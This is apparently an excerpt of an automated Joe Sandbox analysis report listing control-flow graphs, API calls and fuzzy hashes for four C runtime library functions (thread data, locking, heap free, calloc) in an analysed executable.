                                                                                                                          control_flow_graph 127 405926-405941 call 402744 call 403b0c 132 405960-405978 call 401c4d 127->132 133 405943-405947 127->133 140 4059b0-4059bc call 4059c1 132->140 141 40597a-40597c 132->141 133->132 134 405949 133->134 136 40594c-40594e 134->136 138 405950-405957 call 401457 136->138 139 405958-40595f call 402789 136->139 138->139 140->136 142 405998-4059aa InterlockedIncrement 141->142 143 40597e-405987 InterlockedDecrement 141->143 142->140 143->142 147 405989-40598f 143->147 147->142 151 405991-405997 call 40100f 147->151 151->142
                                                                                                                          APIs
                                                                                                                          • __getptd.LIBCMT ref: 00405932
                                                                                                                            • Part of subcall function 00403B0C: __getptd_noexit.LIBCMT ref: 00403B0F
                                                                                                                            • Part of subcall function 00403B0C: __amsg_exit.LIBCMT ref: 00403B1C
                                                                                                                          • __amsg_exit.LIBCMT ref: 00405952
                                                                                                                          • __lock.LIBCMT ref: 00405962
                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 0040597F
                                                                                                                          • InterlockedIncrement.KERNEL32(024215E8), ref: 004059AA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.4108711592.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000008.00000002.4108681419.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108711592.0000000000410000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108782620.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108816560.0000000000421000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108939739.0000000000811000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_400000_wrhivcv.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4271482742-0
                                                                                                                          • Opcode ID: 2334e6e84ce0b42b690fe5780ade924161e65792cc76af17c00e281526f9b2d3
                                                                                                                          • Instruction ID: fc649b866828fe3a6aba54610b1f40b8dfe1b0acd1da268b3fb110b1647a0daf
                                                                                                                          • Opcode Fuzzy Hash: 2334e6e84ce0b42b690fe5780ade924161e65792cc76af17c00e281526f9b2d3
                                                                                                                          • Instruction Fuzzy Hash: 0A018E71A40A11DBDB21AB66980979F7B60EB10B35F55003BE804B72E1C73CA981DFDD

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 154 40100f-401020 call 402744 157 401022-401029 154->157 158 401097-40109c call 402789 154->158 159 40102b-401043 call 401c4d call 401c80 157->159 160 40106e 157->160 172 401045-40104d call 401cb0 159->172 173 40104e-40105e call 401065 159->173 162 40106f-40107f HeapFree 160->162 162->158 165 401081-401096 call 401a58 GetLastError call 401a16 162->165 165->158 172->173 173->158 179 401060-401063 173->179 179->162
                                                                                                                          APIs
                                                                                                                          • __lock.LIBCMT ref: 0040102D
                                                                                                                            • Part of subcall function 00401C4D: __mtinitlocknum.LIBCMT ref: 00401C63
                                                                                                                            • Part of subcall function 00401C4D: __amsg_exit.LIBCMT ref: 00401C6F
                                                                                                                            • Part of subcall function 00401C4D: EnterCriticalSection.KERNEL32(?,?,?,004029AD,00000004,0041F518,0000000C,00404B39,?,?,00000000,00000000,00000000,?,00403ABE,00000001), ref: 00401C77
                                                                                                                          • ___sbh_find_block.LIBCMT ref: 00401038
                                                                                                                          • ___sbh_free_block.LIBCMT ref: 00401047
                                                                                                                          • HeapFree.KERNEL32(00000000,?,0041F450,0000000C), ref: 00401077
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,0041F450,0000000C), ref: 00401088
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.4108711592.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000008.00000002.4108681419.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108711592.0000000000410000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108782620.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108816560.0000000000421000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108939739.0000000000811000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_400000_wrhivcv.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2714421763-0
                                                                                                                          • Opcode ID: 1039cfc2e9dda4ef8c9d4e03381705279fe03aa5f85df280bf8ab46b54df8bc0
                                                                                                                          • Instruction ID: 988edd08e37cd61ce53c6d0e9f96b3e1d6c6ed8ef8af97b43e7782474a441300
                                                                                                                          • Opcode Fuzzy Hash: 1039cfc2e9dda4ef8c9d4e03381705279fe03aa5f85df280bf8ab46b54df8bc0
                                                                                                                          • Instruction Fuzzy Hash: 23018F36905355AAEB307B729D0AB6E7A60AF00364F10013BF944B61E1CB7C85809A5C

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 180 406092-4060ad call 402744 call 403b0c 185 4060d1-4060fa call 401c4d call 406054 call 4060fc 180->185 186 4060af-4060b3 180->186 194 4060bd-4060bf 185->194 186->185 188 4060b5-4060ba call 403b0c 186->188 188->194 196 4060c1-4060c8 call 401457 194->196 197 4060c9-4060d0 call 402789 194->197 196->197
                                                                                                                          APIs
                                                                                                                          • __getptd.LIBCMT ref: 0040609E
                                                                                                                            • Part of subcall function 00403B0C: __getptd_noexit.LIBCMT ref: 00403B0F
                                                                                                                            • Part of subcall function 00403B0C: __amsg_exit.LIBCMT ref: 00403B1C
                                                                                                                          • __getptd.LIBCMT ref: 004060B5
                                                                                                                          • __amsg_exit.LIBCMT ref: 004060C3
                                                                                                                          • __lock.LIBCMT ref: 004060D3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.4108711592.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000008.00000002.4108681419.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108711592.0000000000410000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108782620.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108816560.0000000000421000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108939739.0000000000811000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_400000_wrhivcv.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3521780317-0
                                                                                                                          • Opcode ID: 3d025a6189105e816e7cb29012810986e919689c1c9670e9d6ba45538167e867
                                                                                                                          • Instruction ID: b9ba030beaf64d2d4ed9023fdcda3ac5684e9ec3b6ee0e507fccbd8e021dfb13
                                                                                                                          • Opcode Fuzzy Hash: 3d025a6189105e816e7cb29012810986e919689c1c9670e9d6ba45538167e867
                                                                                                                          • Instruction Fuzzy Hash: 60F09631580700CBD720FB65840675977A06F00719F11427FE456772E2CF7C9941CB5D

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 203 4045fe-404613 call 405390 208 404614 call 404b23 203->208 209 404619-404625 208->209 210 4045f2-4045f5 209->210 211 404627-404699 call 40100f 209->211 212 40469a-40469c 210->212 211->212
                                                                                                                          APIs
                                                                                                                          • _strlen.LIBCMT ref: 00404600
                                                                                                                          • __calloc_crt.LIBCMT ref: 00404614
                                                                                                                            • Part of subcall function 00404B23: __calloc_impl.LIBCMT ref: 00404B34
                                                                                                                            • Part of subcall function 00404B23: Sleep.KERNEL32(00000000), ref: 00404B4B
                                                                                                                            • Part of subcall function 0040100F: __lock.LIBCMT ref: 0040102D
                                                                                                                            • Part of subcall function 0040100F: ___sbh_find_block.LIBCMT ref: 00401038
                                                                                                                            • Part of subcall function 0040100F: ___sbh_free_block.LIBCMT ref: 00401047
                                                                                                                            • Part of subcall function 0040100F: HeapFree.KERNEL32(00000000,?,0041F450,0000000C), ref: 00401077
                                                                                                                            • Part of subcall function 0040100F: GetLastError.KERNEL32(?,?,?,?,?,?,0041F450,0000000C), ref: 00401088
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.4108711592.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000008.00000002.4108681419.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108711592.0000000000410000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108782620.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108816560.0000000000421000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          • Associated: 00000008.00000002.4108939739.0000000000811000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_400000_wrhivcv.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorFreeHeapLastSleep___sbh_find_block___sbh_free_block__calloc_crt__calloc_impl__lock_strlen
                                                                                                                          • String ID: SBVZ
                                                                                                                          • API String ID: 532356523-2208937303
                                                                                                                          • Opcode ID: 7d28ec94137dcd6976ef9e998599681cbf25327a8c7c3c615f8855b4b90ceacd
                                                                                                                          • Instruction ID: 1550c57b97eade3475a04f2b8259fddb2368067d36167e4da6f57c3b37365fe9
                                                                                                                          • Opcode Fuzzy Hash: 7d28ec94137dcd6976ef9e998599681cbf25327a8c7c3c615f8855b4b90ceacd
                                                                                                                          • Instruction Fuzzy Hash: A7F0B4B35082416EE7355F20B904B6277A4E7C0329F65016FD6D0221D2DBBE2847961C